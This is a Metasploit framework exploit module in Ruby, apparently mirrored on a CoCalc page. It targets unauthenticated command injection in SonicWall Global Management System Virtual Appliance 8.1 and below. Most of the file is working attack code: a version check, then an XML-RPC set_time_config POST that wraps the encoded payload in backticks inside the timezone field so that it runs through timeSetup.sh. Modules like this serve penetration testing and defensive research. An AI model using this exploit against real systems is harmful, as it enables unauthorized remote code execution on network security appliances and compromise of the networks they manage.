Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/sonicwall/sonicwall_xmlrpc_rce.rb
19566 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7


8
  Rank = ExcellentRanking

9


10
  include Msf::Exploit::Remote::HttpClient

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => "SonicWall Global Management System XMLRPC set_time_zone Unauth RCE",

17
        'Description' => %q{

18
          This module exploits a vulnerability in SonicWall Global

19
          Management System Virtual Appliance versions 8.1 (Build 8110.1197)

20
          and below. This virtual appliance can be downloaded from

21
          http://www.sonicwall.com/products/sonicwall-gms/ and is used 'in a

22
          holistic way to manage your entire network security environment.'

23


24
          These vulnerable versions (8.1 Build 8110.1197 and below) do not

25
          prevent unauthenticated, external entities from making XML-RPC

26
          requests to port 21009 of the virtual app. After the XML-RPC call

27
          is made, a shell script is called like so:

28
          'timeSetup.sh --tz="`command injection here`"' --usentp="blah"'.

29
        },

30
        'License' => MSF_LICENSE,

31
        'Author' => [

32
          'Michael Flanders', # MSF Module

33
          'kernelsmith' # Advisor

34
        ],

35
        'References' => [

36
          ['URL', 'https://www.digitaldefense.com/digital-defense/vrt-discoveries/'],

37
          ['URL', 'https://slides.com/kernelsmith/bsidesaustin2018/#/']

38
        ],

39
        'Platform' => [ 'unix' ],

40
        'Arch' => ARCH_CMD,

41
        'Targets' => [

42
          [ 'SonicWall Global Management System Virtual Appliance', {} ],

43
        ],

44
        'Payload' => {

45
          # Can't use ampersand, Java's XML-RPC parser will complain and return an error

46
          'BadChars' => "\x26",

47
          'Compat' => {

48
            'PayloadType' => 'cmd',

49
            'RequiredCmd' => 'generic bash telnet'

50
          }

51
        },

52
        'DisclosureDate' => '2016-07-22',

53
        'DefaultTarget' => 0,

54
        'Notes' => {

55
          'Reliability' => UNKNOWN_RELIABILITY,

56
          'Stability' => UNKNOWN_STABILITY,

57
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

58
        }

59
      )

60
    )

61


62
    register_options(

63
      [

64
        OptString.new('WEB_SERVER_PORT', [

65
          false, 'Port of web console login page.

66
                                             Defaults to 80/443 depending on SSL.'

67
        ])

68
      ]

69
    )

70
  end

71


72
  def check

73
    if datastore['WEB_SERVER_PORT']

74
      port_number = datastore['WEB_SERVER_PORT']

75
    else

76
      port_number = datastore['SSL'] ? '443' : '80'

77
    end

78


79
    handler = datastore['SSL'] ? 'https' : 'http'

80


81
    res = request_url("#{handler}://#{rhost}:#{port_number}")

82


83
    unless res

84
      vprint_error 'Connection failed'

85
      return CheckCode::Unknown

86
    end

87


88
    unless res.code == 200 && res.body =~ /<TITLE>.+v(\d\.\d)/

89
      return CheckCode::Safe

90
    end

91


92
    version = Rex::Version.new $1.to_s

93


94
    unless version <= Rex::Version.new('8.1')

95
      return CheckCode::Safe

96
    end

97


98
    CheckCode::Appears

99
  end

100


101
  def exploit

102
    unless check == CheckCode::Appears

103
      fail_with Failure::NotVulnerable, "The target is not vulnerable."

104
    end

105


106
    print_status "The target appears to be vulnerable, continuing exploit..."

107
    send_xml

108
  end

109


110
  def send_xml

111
    xml_body = <<~HERESTRING

112
      <?xml version="1.0" encoding="UTF-8"?>

113
      <methodCall>

114
        <methodName>set_time_config</methodName>

115
        <params>

116
          <param>

117
            <value>

118
              <struct>

119
                <member>

120
                  <name>timezone</name>

121
                  <value>

122
                    <string>"`#{payload.encoded}`"</string>

123
                  </value>

124
                </member>

125
              </struct>

126
            </value>

127
          </param>

128
        </params>

129
      </methodCall>

130
    HERESTRING

131


132
    res = send_request_raw({

133
      'method' => 'POST',

134
      'uri' => '/',

135
      'data' => xml_body,

136
      'ctype' => 'text/xml; charset=UTF-8'

137
    })

138


139
    unless res && res.body.include?("success")

140
      print_error("Error sending XML to #{rhost}:#{rport}")

141
    end

142
  end

143


144
end

145


146